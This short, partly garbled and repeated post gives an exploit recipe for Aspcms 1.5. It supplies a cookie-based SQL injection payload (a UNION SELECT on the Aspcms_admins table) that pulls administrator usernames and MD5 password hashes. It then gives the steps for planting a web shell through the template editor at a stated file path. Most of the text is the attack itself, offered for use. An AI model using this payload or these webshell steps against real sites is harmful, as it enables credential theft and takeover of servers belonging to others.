Aspcms1.5COOKIES are injected into 0day and an account is registered. Then, after logging in, modify the cookie USERID value and add the injection statement: UNIONSELECT1, 2, 3, 4, 5, 6, username, adminpassword, 9, 10, 11, 12, 13, 14, 15, 16, 17,18, 19,20, 21, 22fromAspcms_admins and then edit the account to view the Administrator account and
Aspcms 1.5 COOKIES are injected into 0day and an account is registered. Then, after logging in, modify the cookie USERID Value
Add the following injection statement:
Union select 1, 2, 3, 4, 5, 6, username, adminpassword, 9, 10, 11, 12, 13, 14, 15, 16, 17,18, 19,20, 21,22 from Aspcms_admins |
Edit the account to view the Administrator account and the MD5 password value.
SHELL in the background:
Access admin/_ Style/AspCms_TemplateEdit.asp?FileName = tmdsb. asp add a sentence or trojan in it.
The SHELL is saved in the style directory. Templates/default/html/tmdsb. asp